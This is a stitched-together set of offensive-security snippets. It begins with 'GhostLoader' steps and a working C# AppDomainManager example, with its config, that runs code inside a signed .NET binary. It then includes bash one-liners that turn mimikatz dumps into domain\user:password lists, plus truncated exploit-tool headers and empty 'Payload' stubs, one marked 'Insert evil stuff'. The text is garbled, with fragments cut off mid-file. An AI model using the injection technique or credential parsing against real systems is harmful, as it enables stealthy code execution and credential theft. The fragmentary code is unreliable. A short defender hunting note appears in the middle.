GhostLoader Steps :)
1. Create C:\Tools
2. Copy any .NET binary to C:\Tools
3. In this example we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config sits in the same directory as FileHistory.exe (the CLR only picks up an <app>.exe.config that lives beside the executable)
5. Execute C:\Tools\FileHistory.exe
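The steps above never say what FileHistory.exe.config has to contain. The following is an added example, not GhostLoader's own code: it assumes the managed-injection route in which the CLR is told, through the .exe.config, to load a custom AppDomainManager before the host's Main() runs. The assembly name, type name, log file and build command are hypothetical; the config elements and the AppDomainManager override are real .NET Framework mechanisms.

```csharp
// Added example (not GhostLoader's own code). Assumes the .exe.config route
// that names a custom AppDomainManager; ExampleManager / InjectedManager are
// hypothetical names chosen for this illustration.
//
// Assumed content of C:\Tools\FileHistory.exe.config:
//   <?xml version="1.0" encoding="utf-8"?>
//   <configuration>
//     <runtime>
//       <appDomainManagerAssembly value="ExampleManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
//       <appDomainManagerType value="ExampleManager.InjectedManager" />
//     </runtime>
//   </configuration>
//
// Build the DLL into the host's directory, e.g. with the Framework compiler:
//   csc.exe /target:library /out:C:\Tools\ExampleManager.dll InjectedManager.cs

using System;
using System.Diagnostics;
using System.IO;

namespace ExampleManager
{
    // The CLR instantiates this type in every AppDomain of the host process
    // (the default domain included) and calls InitializeNewDomain before the
    // host's entry point executes, so this code runs inside FileHistory.exe
    // without modifying its image on disk.
    public sealed class InjectedManager : AppDomainManager
    {
        public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
        {
            base.InitializeNewDomain(appDomainInfo);

            // Benign proof of execution: record which process loaded us and
            // from where. ApplicationBase is the directory the host runs from.
            Process proc = Process.GetCurrentProcess();
            string note = string.Format(
                "{0:o} AppDomainManager loaded in {1} (PID {2}) from {3}",
                DateTime.UtcNow, proc.ProcessName, proc.Id, appDomainInfo.ApplicationBase);

            File.AppendAllText(
                Path.Combine(appDomainInfo.ApplicationBase, "injected.log"),
                note + Environment.NewLine);

            // A loader would stage its real payload here; this example stops
            // at demonstrating the execution primitive.
        }
    }
}
```

Two practical caveats: this only works for a .NET Framework host (FileHistory.exe qualifies), and the manager assembly must be resolvable from the application base, which is why the DLL goes into C:\Tools beside the exe. If the host already ships a .config with a <runtime> section, merge the two elements into it rather than replacing the file, or the supportedRuntime settings the host relies on are lost. For defenders, an .exe.config containing appDomainManagerAssembly next to a Microsoft-signed binary is a strong hunting signal, as are the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables, which select the same manager without any file on disk.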
#!/usr/bin/env python
# coding: utf-8
"""
Modified for JtR by Dhiru Kholia in July, 2016
Copyright (c) 2015 Will Bond <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, [email protected]
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license. See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to an ELF
#include <string>
#include <vector>
#include <fstream>
#include <iostream>
#include <filesystem>
#include <Windows.h>
#include <winternl.h>

static_assert( sizeof( void* ) == 8 ); // 64-bit build only
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <http://davenport.sourceforge.net/ntlm.html>
## with additional detail subsequently added from the official protocol spec:
## <http://msdn.microsoft.com/en-us/library/cc236621.aspx>
##
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>

// Thread routine with the CreateThread/CreateRemoteThread signature.
DWORD WINAPI Thread(LPVOID lpParam) {
    // Insert evil stuff
    ExitProcess(0);
    return 0; // not reached; satisfies the LPTHREAD_START_ROUTINE contract
}
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;

public class Payload
{
}
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;

public class Payload
{
    public Payload()
    {
    }
}
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"

First, before using these parsers, run: "dos2unix mimikatz_dump.txt"

Mimikatz 1.0:

cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u

Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class TestClass
{
    public TestClass()
    {}
}